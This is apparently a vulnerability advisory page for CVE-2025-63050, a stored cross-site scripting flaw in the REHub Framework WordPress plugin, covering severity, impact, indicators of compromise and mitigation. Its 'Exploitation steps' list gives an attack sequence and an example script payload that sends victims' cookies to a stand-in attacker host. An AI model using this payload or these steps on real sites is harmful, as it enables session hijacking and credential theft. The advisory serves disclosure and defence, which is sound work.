CVE-2025-63050
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-63050 is a Stored Cross-Site Scripting (XSS) vulnerability in the REHub Framework WordPress plugin developed by Sizam. It affects all versions of the plugin through 19.9.8 and was published on December 9, 2025, with Patchstack credited as the assigning authority. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium), requiring low privileges and user interaction to exploit (Feedly, Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An authenticated attacker with low-level privileges can inject malicious scripts into fields processed by the REHub Framework plugin, which are then persistently stored and rendered in the browser of any user who views the affected content. The attack vector is network-based, requires low attack complexity, and the scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself (Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of web content. Because the payload is stored server-side, every user who visits the affected page is at risk without any further attacker interaction. The changed scope indicates potential for cross-context impact, such as affecting site administrators and escalating privileges within the WordPress installation (Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-63050 as of the available data. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.042%, indicating a low probability of exploitation in the near term (Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the REHub Framework plugin at version 19.9.8 or earlier using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Obtain low-privilege access: Register or log in as a low-privileged user (e.g., subscriber or contributor) on the target WordPress site.
  3. Inject malicious payload: Submit a crafted input containing a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field processed by the REHub Framework plugin.
  4. Payload persistence: The malicious script is stored in the WordPress database by the plugin without proper sanitization or escaping.
  5. Trigger execution: When an administrator or other user visits the page containing the stored payload, the script executes in their browser, enabling session hijacking, credential theft, or further malicious actions (Feedly).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related endpoints from low-privilege accounts containing encoded or obfuscated script tags (e.g., <script>, javascript:, onerror=).
  • Database: Unexpected JavaScript or HTML script tags stored in WordPress database fields associated with REHub Framework plugin data (e.g., wp_postmeta, wp_options, or custom plugin tables).
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages rendered by the REHub Framework plugin, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for a stored XSS, but review plugin configuration files for unauthorized modifications.

Mitigation and workarounds

Users should update the REHub Framework plugin to a version beyond 19.9.8 as soon as a patched release is made available by the vendor (Sizam). In the interim, site administrators should restrict plugin input fields to trusted users only and consider using a Web Application Firewall (WAF) with XSS filtering rules to block malicious payloads. Monitoring WordPress user activity logs for suspicious input submissions by low-privilege accounts is also recommended (Feedly, Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15413CRITICAL10
  • link-factory
NoNoAug 13, 2026
CVE-2026-18146HIGH7.2
  • fluentform
NoYesAug 13, 2026
CVE-2026-3639MEDIUM6.4
  • password-protect-page
NoNoAug 13, 2026
CVE-2026-14332MEDIUM5.4
  • ecwid-shopping-cart
NoYesAug 13, 2026
CVE-2026-3835MEDIUM5.3
  • prevent-direct-access
NoYesAug 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management